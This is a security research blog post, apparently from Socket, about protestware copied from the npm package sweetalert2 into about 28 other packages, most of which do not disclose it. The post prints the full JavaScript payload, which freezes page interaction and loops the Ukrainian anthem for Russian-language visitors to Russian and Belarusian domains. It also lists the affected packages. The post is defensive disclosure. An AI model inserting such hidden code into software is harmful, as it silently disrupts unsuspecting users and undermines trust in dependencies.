
Research
/Security News
60 Malicious Ruby Gems Used in Targeted Credential Theft Campaign
A RubyGems malware campaign used 60 malicious packages posing as automation tools to steal credentials from social media and marketing tool users.
Olivia Brown
July 15, 2025
Socket’s Threat Research Team recently reported on two npm packages with hidden functionality for Russian-language users visiting Russian domains in a browser. In the last few weeks, the team has found the same protestware script across at least 28 new packages with nearly 2,000 versions.
As a reminder, this code will stop UI interactions on websites from working for any Russian-language users visiting Russian or Belarusian websites, falling under the classification of Socket’s protestware alert.
Most of these packages have had 100,000+ lines of code in them:
Deep within the code, usually towards the end, there is an identical code snippet to the one discussed in our original blog post.
It is a complex if statement
that requires the user (1) is using a browser (2) has their browser language settings set to Russian and (3) is visiting a Russian or Belarusian domain. If all three stipulations are met, the protestware will disable all mouse-based interaction on the page and play the Ukrainian national anthem.
// Dear russian users visiting russian sites. Let's have fun.
if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
var now = new Date();
var initiationDate = localStorage.getItem('swal-initiation');
if (!initiationDate) {
localStorage.setItem('swal-initiation', "".concat(now));
} else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
setTimeout(function () {
document.body.style.pointerEvents = 'none';
var ukrainianAnthem = document.createElement('audio');
ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
ukrainianAnthem.loop = true;
document.body.appendChild(ukrainianAnthem);
setTimeout(function () {
ukrainianAnthem.play()["catch"](function () {
// ignore
});
}, 2500);
}, 500);
}
}
Sweetalert2
, a package with over 700,000+ weekly downloads, has certain versions containing the protestware. It’s a package for "A beautiful, responsive, customizable and accessible (WAI-ARIA) replacement for JavaScript's popup boxes, supported fork of sweetalert."
On sweetalert2
's npm registry page, the author discloses the protestware:
Important notice about the usage of this software for .ru, .su, .by, and .рф domain zones As a consequence of the illegal war in Ukraine, the behavior of this repository and related npm package sweetalert2 is different for .ru, .su, .by, and .рф domain zones.
Including this software in any domain in .ru, .su, .by, and .рф domain zones will block the website navigation and play the national anthem of Ukraine.
The author, limonte
, began disclosing this information in version 11.6.14
, which was published 3 years ago, likely when Russia invaded Ukraine, and has disclosed it in every version since. The package is currently on version 11.22.2
. Versions 9.17.3
11.6.6
also include this protestware.
However, several different packages with different authors all seem to have this protestware without any mention of it. It is not listed or acknowledged in their README files, nor any other place. It seems they downloaded it from SweetAlert2, based on the similar file name and structure between different packages with the protestware. The protestware has spread from SweetAlert2, likely through copied code, in a pattern resembling unintentional supply chain propagation.
Here is a list of some of the packages we have found with the protestware:
Package | Publish Date | Peak Download # | Author info | Current State | Versions | Most recent version update
starlawfirm-counsel-function-test
| Created 5 Months Ago | 1,281 | @kimminsu_2
| Deprecated | All (18) | Version 0.2.4 Published 5 Months Ago@starlawfirm/counsel-function
| Created 5 Months Ago | 284 | @choiyeongung
, @kimminsu_2
,imjiwon
, leegeonju2
| Live | All (13) | Version 0.0.12 published 17 hours agofalcon-library-comp
| Created 6 Months Ago | 1,822 | falcon.ttt
| Live | 0.0.34 - 0.0.42
(7) | Version 0.0.42 | Published 5 Months Agovristo-components
| Created A Year Ago | 575 | amirzarei
| Live | 0.0.12 - 0.1.8
(29) | Version 0.1.8 | Published A Year Agocurrency_contry_exchange
| Created 9 Months Ago | 1,276 | [lash1795](<https://www.npmjs.com/~lash1795>)
| Live | 1.2.7 - 1.7.1
(27) | Version 1.7.1 | Published 21 Hours Ago@flasher/flasher-sweetalert
| Created 3 Years Ago | 276 | [yoeunes](<https://www.npmjs.com/~yoeunes>)
| Live | All (29) | Version 2.1.5 | Published 5 Months Ago@khaledtag/karrot_ui
| Created A Year Ago | 446 | khaledtag
| Live | All (13) | Version 0.0.51 | Published 10 Months Agoraffoom-poltergeist
| Created 2 Years Ago | 156 | raffoom-ltd
| Live | 0.0.7-rev-006 - 0.0.9-rev1
(11) | Version 0.0.9-rev1 | Published 2 Months Ago@trustech/components
| Created 9 Months Ago | 378 | power_trustech
| Live | 1.0.3 - 1.2.10
(19) | Version 1.2.10 | Published 5 Months Agobe-table-template
| Created Last Year | 951 | taonv
| Live | 1.0.1 - 2.9.8
(198) | Version 2.9.8 | Published A Month Agoshafa-bo
| Created Last Year | 233 | binapm
| Live | 0.0.68 - 0.0.134
(49) | Version 0.0.134 | Published A Year AgoPandora-Cloud-DC
| Created 2 Years Ago | dockercore
| Live | All (1) | Version 0.1.0 | Published 2 Years Agofakeoai
| Created 1 Year Ago | laibaoyuan
| Live | 0.1.5 - 0.1.6
(2) | Version 0.1.6 | Published 1 Year AgoPandora-Cloud
| Created 2 Years Ago | pengzhile
| Live | 0.4.7- 0.7.3
(12) | Version 0.7.3. | Published 1 Year Agorichness-client-side-validator
| Created 2 Years Ago | richnessinc
| Deprecated | 1.1.0 - 1.5.7
(14) | Version 1.5.7 | Published 2 Years Agokdpa-components
| Created 2 Years Ago | 734 | work.enaadb
, frontenddepna
, lotfalizade.moh
| Live | 1.0.0 - 1.58.4
(259) | 1.58.4 | Published Last Weekcoone-annotation-tool
| Created 2 Years Ago | 1,150 | mede
| Live | 0.0.78 - 0.1.153
(177) | Version 0.1.155 | Published 9 Hours Agolanding-goplaceit2
| Created 2 Years Ago | 32 | enzo388
| Live | 1.0.48 - 1.0.58
(10) | Version 1.0.58 | Published 2 Years Agomeshcentral
| Created 8 Years Ago | 16,895 | ysainthilaire
| Live | [1.1.32 - 1.1.44](<https://www.npmjs.com/package/meshcentral/v/0.9.68?activeTab=versions>)
(12) | Version 1.1.44 | Published 20 Hours Ago@esvndev/es-react-table-interface
| Created 2 Months Ago | 820 | esvndev
| Live | All (62) | Version 1.4.6 | Published 4 Days Ago@esvndev/es-react-dynamic-column
| Created Last Month | 673 | esvndev
| Live | All (14) | Version 1.0.14 | Published A Month Agofiles.photo.gallery
| Created 5 Years Ago | 409 | [photo.gallery
](http://photo.galleryhttps://www.npmjs.com/~photo.gallery) | Live | 0.6.0 - 0.13.1
(33) | Version 0.13.1 | Published A Month Agoqti3-item-player
| Created 4 Years Ago | 267 | paulgrudnitski
| Live | 0.4.15 - 1.1.20
(40) | Version 1.1.20 | Published 2 Months Agoqumra-ui
| Created 10 Months Ago | 2,074 | abdalstar
, khalidwalid00
| Live | 0.0.71- 0.0.153
(82) | Version 0.0.153 | Published 3 Months Agoqumra-editor
| Created 12 Months Ago | 227 | abdalstar
, motea
| Live | 0.0.4 - 0.0.8
(4) | Version 0.0.8 | Published 10 Months Agoalurkerja-ui
| Created 2 Years Ago | 1,521 | theakistea
| Live | [0.0.3 - 0.0.575](<https://www.npmjs.com/package/alurkerja-ui?activeTab=versions>)
(572) | Version 0.0.575 | Published A Month Agokonnektive-engine
| Created 3 Years Ago | 229 | brunoferreiras
, drew.altukhov
| Live | 0.2.2 - 0.3.82
(59) | Version 0.3.82 | Published A Month Agoes-workflow-template
| Created 5 Months Ago | 602 | becoxy
| Live | All (32) | Version 0.4.5 | Published 18 Days Agolimonte
ensured that only repeat visitors are targeted, so anyone who mistakenly finds their way to such a domain and has their language set to Russian will not be impacted. Unless, of course, they make that same mistake twice.
Other users may be Russian-speaking researchers visiting official state websites or archived domains. As a note, many people speak Russian across the world, including people in Central Asia like Kazakhstan and in Ukraine.
Since so many packages downloaded versions of SweetAlert2
without disclosing that this protestware exists in their code, it’s likely the addition of this protestware has had a cascading effect.
Protestware is a formidable method of speech for software developers to express political or social stances. Socket supports this freedom for developers to create as they see fit.
We are marking these packages as malware since that is the definition with which the activity aligns most closely. The package triggers unexpected behavior for some users and, other than sweetalert2
itself, the behavior is not documented. Because the protestware is undocumented in most of these packages, developers and users may be unaware of its presence or intent, even if it was copied unintentionally. This lack of transparency increases the risk of surprise behavior and erodes trust in the ecosystem.
Socket has flagged the packages with this protestware as malware, with the following explicit description:
The package contains a hidden payload that targets Russian language users visiting Russian and Belarusian sites. For those users, it will disable user interaction and play a looping audio of the Ukrainian anthem after 3 days. Therefore, it is marked as malware only because it freezes interactions for many users. This behavior is not disclosed in any documentation of the package and seriously disrupts user experience.
This protestware underscores that actions taken by developers can propagate unnoticed in nested dependencies and may take days or weeks to manifest. The Socket Threat Research Team continues to find more examples of this protestware. These findings serve as a reminder to check your packages. Socket can help.
By integrating Socket's free security tools early in your development workflow, you can effectively prevent unknown functionality.
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
/Security News
A RubyGems malware campaign used 60 malicious packages posing as automation tools to steal credentials from social media and marketing tool users.
Research
/Security News
Two npm packages masquerading as WhatsApp developer libraries include a kill switch that deletes all files if the phone number isn’t whitelisted.
Research
/Security News
Socket uncovered 11 malicious Go packages using obfuscated loaders to fetch and execute second-stage payloads via C2 domains.